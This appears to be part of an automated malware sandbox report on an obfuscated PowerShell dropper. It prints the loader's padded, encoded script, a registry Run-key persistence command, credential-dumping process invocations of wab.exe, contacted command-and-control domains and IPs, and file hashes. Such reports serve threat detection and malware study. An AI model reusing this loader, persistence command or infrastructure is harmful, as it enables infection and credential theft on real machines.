SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP 
FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. 
Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ckqp"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nevhszl"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xgiatrwwao"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | madibarohilalatwo.duckdns.org | udp |
| DE | 84.247.187.12:80 | madibarohilalatwo.duckdns.org | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.187.247.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cadenaderegalos.com | udp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 8.8.8.8:53 | 125.68.49.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | odogwuvisual123.duckdns.org | udp |
| SG | 206.123.138.32:6767 | odogwuvisual123.duckdns.org | tcp |
| US | 8.8.8.8:53 | 32.138.123.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| SG | 206.123.138.32:6767 | odogwuvisual123.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
memory/1556-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp
memory/1556-10-0x0000015C111D0000-0x0000015C111F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3q0im1hw.zzu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1556-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/1556-12-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/4900-15-0x0000000004840000-0x0000000004876000-memory.dmp
memory/4900-16-0x0000000004FE0000-0x0000000005608000-memory.dmp
memory/4900-17-0x0000000004FA0000-0x0000000004FC2000-memory.dmp
memory/4900-18-0x0000000005740000-0x00000000057A6000-memory.dmp
memory/4900-19-0x00000000057B0000-0x0000000005816000-memory.dmp
memory/4900-29-0x0000000005820000-0x0000000005B74000-memory.dmp
memory/4900-30-0x0000000005E20000-0x0000000005E3E000-memory.dmp
memory/4900-31-0x0000000005E40000-0x0000000005E8C000-memory.dmp
memory/4900-32-0x00000000076A0000-0x0000000007D1A000-memory.dmp
memory/4900-33-0x0000000006380000-0x000000000639A000-memory.dmp
memory/4900-34-0x00000000070C0000-0x0000000007156000-memory.dmp
memory/4900-35-0x0000000007050000-0x0000000007072000-memory.dmp
memory/4900-36-0x00000000082D0000-0x0000000008874000-memory.dmp
C:\Users\Admin\AppData\Roaming\Droh.Lit
| MD5 | 1a958060ba3e3de4653959fe2fd1efd5 |
| SHA1 | c5d3a5646dc5920668f1f61c334c7c7d40c888b5 |
| SHA256 | 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab |
| SHA512 | 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0 |
memory/4900-38-0x0000000008880000-0x000000000B149000-memory.dmp
memory/1556-39-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp
memory/1556-40-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/1556-48-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp
memory/2160-45-0x00000000016B0000-0x0000000003F79000-memory.dmp
memory/4924-52-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2256-56-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4924-57-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1204-60-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1204-59-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1204-58-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2256-55-0x0000000000400000-0x0000000000462000-memory.dmp
memory/4924-54-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2256-53-0x0000000000400000-0x0000000000462000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ckqp
| MD5 | 8651f1ecc401fe73c45d06863467d144 |
| SHA1 | 0150ba4649afe382ae1705552473bba7beb990f4 |
| SHA256 | 51827e101e890667e6d9b8aa7b804d56b53cadc110b5b8b834229788c29a65e8 |
| SHA512 | c0b371d9080c0e82adae100a9400bb7bd239cfe243c072dde0f9310524b92d16a10db9117403d8af227cef9def552dba7c04da3b3bd46a88836acc071cb9890f |
memory/2160-66-0x000000001FFE0000-0x000000001FFF9000-memory.dmp
memory/2160-70-0x000000001FFE0000-0x000000001FFF9000-memory.dmp
memory/2160-69-0x000000001FFE0000-0x000000001FFF9000-memory.dmp